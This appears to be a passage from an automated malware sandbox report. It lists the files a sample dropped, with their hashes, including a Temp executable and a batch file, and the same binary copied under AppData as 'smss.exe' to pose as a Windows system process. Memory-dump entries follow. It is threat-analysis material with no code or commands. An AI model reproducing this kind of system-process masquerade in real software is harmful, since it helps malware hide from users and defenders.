8f71c8b1d3dfc7997d945b8ffa1331874246cb0fc64f56eb2a25c9fa0b978ef9

SHA512
a96110ee91309ab8a15df7e5ecef220cfc2289180c54c789ceb148cc6a74c2c1339a3271267611ee963556d2c8c824d3274bcdb92c7476bb10a7553ade121e62

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

MD5
5853495819c12953e611cca9d1df20a6

SHA1
c2ab03e520baca02509d13b874f98a11eccbf97a

SHA256
af4ad165f956d9f4b0b28fe3cf109d22e037152261bb132b01759abbfff193c4

SHA512
1e7b4a55632b53ceb18ab909df68fe8e21e4a3e50b6b4b7e44da3e662da2b6f1142ad2aa2e022f8efe0702fbaaf05eb8767df6dae76599973fa8b10f58e2be44

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

MD5
0e8dd2e802d289d7fad334886926dfe0

SHA1
3c7e37b0574f1af35590b516a5e1c85ef25ca6e3

SHA256
982c8039205a17211233ad08a1e271fa8370f263d0bcf633695e5ec7b139380d

SHA512
888d17cb6f3dd87cbaa9480a4846df9b7517ec9e29ba0a44c295760b8470221cd3ba9b77450252e83bb4a5001f6d7cda5ee842d895ee49b611a424bb96d59bf6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5
9773b0bfd3bc9fd0e830c05f6866c343

SHA1
8f49992bcf3e421e5fe988806cc3e0613a321e3a

SHA256
b730c7e0aac4cb57181ea00b923a96ad563f5fb5774f1f767eede0edfd5e6cbc

SHA512
1561825209673dcecd583105dd378417febeaa802737c622cdbdd05bd86a4d52c5ccc67595de3bb9437193b0becd9e5cb1a9406821dd4f92a2c8610bf31bc10f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\EEUV2G9N.htm

MD5
b1cd7c031debba3a5c77b39b6791c1a7

SHA1
e5d91e14e9c685b06f00e550d9e189deb2075f76

SHA256
57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

SHA512
d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZIIA2USJ\YSR9BGOA.htm

MD5
8615e70875c2cc0b9db16027b9adf11d

SHA1
4ed62cf405311c0ff562a3c59334a15ddc4f1bf9

SHA256
da96949ba6b0567343f144486505c8c8fa1d892fd88c9cbc3ef3d751a570724d

SHA512
cd9dfc88dc2af9438b7d6b618d1b62029b3bdf739fc4daa5b37397afd12c4528561b3bf2fc3f3f2adf3fd1f582d5524332441fd30248fcd078e41aa91e17cb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe

MD5
de904e0d5b71c0c3d99430b61d40aae2

SHA1
5e1add3f70404f2110c389674e481484365eead4

SHA256
43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

SHA512
25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe

MD5
de904e0d5b71c0c3d99430b61d40aae2

SHA1
5e1add3f70404f2110c389674e481484365eead4

SHA256
43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

SHA512
25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\~temp001.bat

MD5
ef572e2c7b1bbd57654b36e8dcfdc37a

SHA1
b84c4db6d0dfd415c289d0c8ae099aea4001e3b7

SHA256
e6e609db3f387f42bfd16dd9e5695ddc2b73d86ae12baf4f0dfc4edda4a96a64

SHA512
b8c014b242e8e8f42da37b75fe96c52cd25ebd366d0b5103bcba5ac041806d13142a62351edecdee583d494d2a120f9b330f6229b1b5fe820e1c7d98981089e9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe

MD5
de904e0d5b71c0c3d99430b61d40aae2

SHA1
5e1add3f70404f2110c389674e481484365eead4

SHA256
43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

SHA512
25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe

MD5
de904e0d5b71c0c3d99430b61d40aae2

SHA1
5e1add3f70404f2110c389674e481484365eead4

SHA256
43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

SHA512
25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe

MD5
de904e0d5b71c0c3d99430b61d40aae2

SHA1
5e1add3f70404f2110c389674e481484365eead4

SHA256
43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

SHA512
25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

Download Submit
memory/1148-171-0x0000000000D00000-0x0000000000E44000-memory.dmp

Filesize
1.3MB

Download
memory/1148-169-0x0000000000000000-mapping.dmp

Download
memory/1824-163-0x0000000000000000-mapping.dmp

Download
memory/1900-165-0x0000000000000000-mapping.dmp

Download
memory/2764-120-0x00000278B04A0000-0x00000278B04A1000-memory.dmp

Filesize
4KB

Download
memory/2764-132-0x00000278AEB20000-0x00000278AEB22000-memory.dmp

Filesize
8KB

Download
memory/2764-133-0x00000278AEB23000-0x00000278AEB25000-memory.dmp

Filesize
8KB

Download
memory/2764-126-0x00000278C94B0000-0x00000278C94B1000-memory.dmp

Filesize
4KB

Download
memory/2764-134-0x00000278AEB26000-0x00000278AEB28000-memory.dmp

Filesize
8KB

Download
memory/2764-115-0x0000000000000000-mapping.dmp

Download
memory/2832-168-0x0000000000000000-mapping.dmp

Download
memory/2892-174-0x0000000000000000-mapping.dmp

Download
memory/2960-114-0x0000000000000000-mapping.dmp

Download
memory/2976-175-0x0000000000000000-mapping.dmp

Download
memory/3032-167-0x0000000000000000-mapping.dmp

Download
memory/3124-173-0x0000000000000000-mapping.dmp

Download
memory/3272-176-0x0000000000000000-mapping.dmp

Download
memory/3588-162-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

Filesize
4KB

Download
memory/3588-152-0x0000000000000000-mapping.dmp

Download
memory/3604-164-0x0000000000000000-mapping.dmp

Download
memory/3732-166-0x0000000000000000-mapping.dmp

Download
memory/3924-147-0x0000000000BB0000-0x0000000000CF4000-memory.dmp

Filesize
1.3MB

Download
memory/3924-148-0x0000000000400000-0x000000000054B000-memory.dmp

Filesize
1.3MB

Download
memory/3924-143-0x0000000000000000-mapping.dmp

Download
memory/4040-161-0x0000000000E00000-0x0000000000F44000-memory.dmp

Filesize
1.3MB

Download
memory/4040-149-0x0000000000000000-mapping.dmp

Download